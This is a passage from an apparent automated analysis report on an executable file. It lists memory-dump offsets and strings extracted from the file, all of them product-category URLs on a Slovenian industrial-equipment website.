https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/prenosni-vlagomerji-higr
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/razdelitev-po-industrijskih-sektorjih/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/razdelitev-po-industrijskih-sektorjih/data-logger
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/razdelitev-po-industrijskih-sektorjih/zivilska-in
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/livarski-termomete
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/merilni-pretvornik
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/profesionalni-seti
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/resitve-za-asfalte
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/resitve-za-krusno-
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/tipala-za-meritve-
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-storitve/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/fiksni-detektorji-wireless/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/fiksni-detektorji-wireless/nadzorne-enote-fiksni-detektorji-
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/grelci-polprevodniski-releji-ssr-in-tiristorji/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/grelci-polprevodniski-releji-ssr-in-tiristorji/hladilniki-za
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/grelci-polprevodniski-releji-ssr-in-tiristorji/ssr-rele-polp
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/grelci-polprevodniski-releji-ssr-in-tiristorji/tiristorski-r
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/dodatna-oprema-za-ind
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 